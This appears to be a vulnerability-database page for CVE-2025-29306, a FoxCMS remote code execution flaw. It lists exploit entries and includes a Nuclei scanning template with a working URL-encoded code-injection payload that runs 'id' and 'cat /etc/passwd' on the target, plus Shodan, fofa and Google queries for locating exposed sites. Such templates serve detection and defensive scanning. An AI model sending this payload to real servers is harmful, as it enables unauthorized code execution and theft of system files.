| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Exploit for Code Injection in Foxcms | 22 Apr 202509:00 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 25 Mar 202508:12 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 18 Sep 202504:53 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 26 Nov 202518:13 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 10 May 202513:14 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 25 Apr 202503:45 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 7 Jan 202605:08 | – | githubexploit | |
| Exploit for Code Injection in Foxcms | 17 Apr 202508:44 | – | githubexploit | |
| The vulnerability of the Case Display Page component of the FoxCMS content management system allows a hacker to execute arbitrary code. | 6 Jan 202600:00 | – | bdu_fstec | |
| CVE-2025-29306 | 27 Mar 202520:50 | – | circl |
id: CVE-2025-29306
info:
name: FoxCMS v.1.2.5 - Remote Code Execution
author: ritikchaddha
severity: critical
description: |
An issue in FoxCMS v.1.2.5 allows a remote attacker to execute arbitrary code via the case display page in the index.html component.
impact: |
Unauthenticated attackers can execute arbitrary code through the id parameter in the index.html component, leading to complete server compromise.
remediation: |
Update to the latest version of FOXCMS if available. If no patch is available,implement WAF rules to block malicious requests to the /images/index.html endpoint with suspicious 'id' parameter values.
reference:
- https://github.com/verylazytech/CVE-2025-29306/blob/main/CVE-2025-29306.sh
- https://medium.com/@verylazytech
- https://nvd.nist.gov/vuln/detail/CVE-2025-29306
classification:
epss-score: 0.43655
epss-percentile: 0.98584
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-29306
cwe-id: CWE-94
metadata:
verified: true
max-request: 1
fofa-query: (body="foxcms-logo" || body="foxcms-container") && body="div"
google-query: intitle:"FOXCMS" intext:"foxcms-logo"
shodan-query: html:"foxcms-logo"
tags: cve,cve2025,rce,foxcms,unauth,oast,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/images/index.html?id=%24%7B%40print_r%28%40system%28%22{{command}}%22%29%29%7D"
payloads:
command:
- "id"
- "cat /etc/passwd"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=[0-9]+\\(\\w+\\) gid=[0-9]+\\(\\w+\\)"
- "root:.*:0:0:"
condition: or
- type: word
part: body
words:
- "foxcms"
case-insensitive: true
- type: status
status:
- 200
# digest: 4b0a00483046022100fcf2853741ee2333566ac99a70e63dca03a34c6d4093cd17372721968cfe550302210099713b5d884cdd9bbf892f3a94f7eb9a0875986f0e4b659d17582035a6b55b80:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation